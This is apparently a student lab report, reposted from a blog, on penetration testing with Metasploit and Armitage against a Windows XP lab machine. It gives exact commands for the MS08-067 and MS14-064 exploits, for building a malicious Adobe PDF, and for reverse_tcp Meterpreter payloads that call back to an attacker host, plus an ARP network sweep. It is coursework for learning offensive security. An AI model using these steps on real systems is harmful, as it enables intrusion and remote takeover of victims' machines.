用自己的话解释什么是exploit,payload,encode
exploit是渗透攻击,说白了就是:攻击者利用系统、应用或服务中的安全漏洞去进行攻击。
payload直译过来叫载荷,是目标系统在被渗透攻击之后去执行的代码。例如,之前做过的几个实验都利用反弹式shell来在攻击主机与受害主机之间创建连接。
encode是对payload中的代码进行变形,以达到免杀目的的编码。
靶机:Windows XP SP2 (English)
首先在kali终端上输入/etc/init.d/postgresql start
,启动postgresql服务。
输入armitage
启动Armitage。
根据已知信息推导出目标主机所在网段的IP,扫描目标网段完整信息,确认目标网络拓扑结构以实施网络侦查。依次选择Hosts
->Nmap Scan
->Quick Scan(OS detect)
。
填写靶机所在网段172.20.10.0/24
。
扫描得出所有该网段的虚拟机。
选中靶机172.20.10.2
,右键选择Services,查看靶机上开启的服务。
选中靶机172.20.10.2
,右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据。
利用上一步中漏洞扫描得到的漏洞信息,自动搜索Metasploit攻击模块库,寻找合适的攻击模块。选中靶机172.20.10.2
,依次选择菜单栏Attacks
->Find Attacks
,Armitage会开始自动搜索寻找合适的攻击模块。
搜索完成。
在利用Armitage完成对靶机的攻击模块自动化搜索以后,选中172.20.10.2
主机右键可以发现多了Attack
菜单。依次选择Attack
->smb
->ms08_067_netapi
菜单,选择smb
漏洞下的ms08_067漏洞对XP靶机进行攻击(也可以在Armitage左侧树型目录下依次选择exploit
->windows
->smb
->ms08_067_netapi
找到该漏洞)。
在弹出的攻击配置对话框中配置LHOST/RHOST、LPORT/RPORT等信息,Targets处配置靶机的系统(一般默认自动检测靶机系统),勾选Use a reverse connection,点击Launch开始攻击。
Armitage会进行一系列自动化攻击!攻击完成后,会看到靶机被红色闪电围绕,证明攻击成功。
Armitage会自动建立一个驻留在内存的shellcode即Meterpreter。在攻击成功的靶机上右键选择Meterpreter 1
->Interact
->Command Shell
,输入dir
命令查看靶机C:\WINDOWS\system32目录下的系统文件。
在攻击成功的靶机上右键选择Meterpreter 1
->Interact
->Meterpreter Shell
,输入getuid
命令查看靶机当前用户的权限是SYSTEM权限。
靶机:Windows XP SP2 (English)
使用漏洞use windows/browser/ms14_064_ole_code_execution
选择攻击载荷set payload windows/meterpreter/reverse_tcp
设置攻击机ipset LHOST 172.20.10.13
设置攻击端口set LPORT 5233
设置url域名·set URIPATH zyx5233`
开始攻击exploit
在浏览器输入http://172.20.10.13:8080/zyx5233
建立会话sessions -i 1
,即可通过shell
来进行一系列信息的查看。
靶机:Windows XP SP2 (English)
使用漏洞use windows/fileformat/adobe_toolbutton
选择攻击载荷set payload windows/meterpreter/reverse_tcp
设置攻击机ipset LHOST 172.20.10.13
设置攻击端口set LPORT 5233
开始攻击exploit
,此时/root/.msf4/local/
目录下成功生成了一个20165233.pdf文件,将其拖至Windows XP虚拟机内。
使用监听模块use exploit/multi/handler
开始监听,此时在Windows XP虚拟机上,用Adobe打开20165233.pdf文件,可看到攻击并回连成功。
通过此模块可扫描局域网的一个网段内有多少主机存活。
使用discovery/arp_sweep模块use/auxiliary/scanner/discovery/arp_sweep
查看选项show options
目标网段set RHOSTS 10.180.100.0/24
线程set THREADS 50
开始exploit
,扫描结果如下:
原文:https://www.cnblogs.com/minchan0624/p/10713542.html